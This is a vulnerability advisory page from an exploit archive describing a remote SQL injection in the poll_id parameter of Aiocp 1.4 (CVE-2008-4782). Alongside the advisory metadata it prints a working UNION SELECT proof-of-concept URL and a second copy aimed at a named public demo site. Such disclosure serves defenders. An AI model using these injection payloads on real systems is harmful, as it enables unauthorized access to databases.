|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
If you have found a vulnerability, please send to our SecurityAlert Database : secalert()securityreason()com
Also if you have new ( 0-day ) exploit, please send to our ExploitAlert Archive :
exploit()securityreason()com |
|
|
Home SecurityAlert Database |
|
|
Topic : | Aiocp 1.4 (poll_id) Remote SQL Injection Vulnerability
|
SecurityAlert : 4518
CVE : CVE-2008-4782
CWE : CWE-89
SecurityRisk : High (About)
Remote Exploit : Yes
Local Exploit : No
Victim interaction required : No
Exploit Available : Yes
Credit : ExSploiters
Published : 29.10.2008
Affected Software : | aiocp:aiocp:1.4.001
aiocp:aiocp:1.4.000 |
 Advisory Content : ###########################################
# Aiocp 1.4 Remote SQL Injection vulnerability
#
# Found by : ExSploiters
#
# Contact : exsploiters@gmail.com
#
# Download :
http://sourceforge.net/project/showfiles.php?group_id=159137&package_id=178
594&release_id=619157
###########################################
PoC :
http://[target]/[path]/public/code/cp_polls_results.php?poll_language=eng&p
oll_id=-0+union+select+0,1,2,version(),4,5,6--
L!ve Demo :
http://demo.opensourcecms.com/aiocp/public/code/cp_polls_results.php?poll_l
anguage=eng&poll_id=-0+union+select+0,1,2,version(),4,5,6--
Greetz :
no one =)
Feedback :
If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com.
|
|
|
|